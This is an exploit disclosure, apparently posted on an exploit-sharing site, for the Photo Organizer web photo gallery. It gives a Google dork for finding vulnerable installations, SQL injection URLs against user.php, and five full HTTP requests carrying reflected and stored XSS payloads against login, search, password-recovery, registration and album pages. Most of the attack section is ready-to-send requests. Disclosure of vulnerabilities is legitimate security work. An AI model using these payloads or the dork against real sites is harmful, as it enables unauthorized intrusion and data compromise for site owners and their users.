facebook facebook twitter rss

Powered Photo Organizer XSS and SQL Vulnerabilities

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|
|[+] Exploit Title:Powered Photo Organizer XSS and SQL Vulnerabilities
|[+] Date:13/10/2018
|[+] Exploit Author :Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] Vendor Homepage: http://po.shaftnet.org/
|[+] dork:# "intext:"Powered by Photo Organizer"
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] Software Link: http://po.shaftnet.org/#download
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------

|[+] RHG hackers iran team

***************************************************************|

0x01# ~ Introduction

====================

At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.”

To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.



0x02# ~ Exploitation

====================



1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Boolean SQL Injection & Blind [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



http://site.com/user.php?user=1 and 1=2

http://site.com/user.php?user=1 union select 1,2--

http://site.com/user.php?user=-1 OR 17-7=10



1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Reflected XSS Cross Site Scripting [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



Affected path(s):login.php

search.text.general.php

login.php?operation=get_email

register.php



========================== HTTP REQUEST XSS 1 ==============================

Host site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/login.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 113

POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0



XSS Proof Image: http://i.imgur.com/VmbmuiZ.png

============================================================================





========================== HTTP REQUEST XSS 2 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/search.text.general.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 109

POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0



XSS Proof Image: http://i.imgur.com/PDcO50Y.png

============================================================================





========================== HTTP REQUEST XSS 3 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/login.php?operation=get_email

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0



XSS Proof Image: http://i.imgur.com/MFc5unu.png

============================================================================





========================== HTTP REQUEST XSS 4 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/register.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 207

POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0



XSS Proof Image: http://i.imgur.com/7T4WZMW.png

============================================================================





1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Persistent XSS Cross Site Scripting [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



Affected path(s):album.add.php?parent=



========================== HTTP REQUEST XSS 5 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/album.add.php?parent=

Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 132

POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0



XSS Proof Image: http://i.imgur.com/TrzBqXJ.png

****************************************************************

Discovered by :RednofoziRGH team hackers

Thanks To: ReZa CLONER , Moeein Seven. Rednofozi

Like us on Facebook :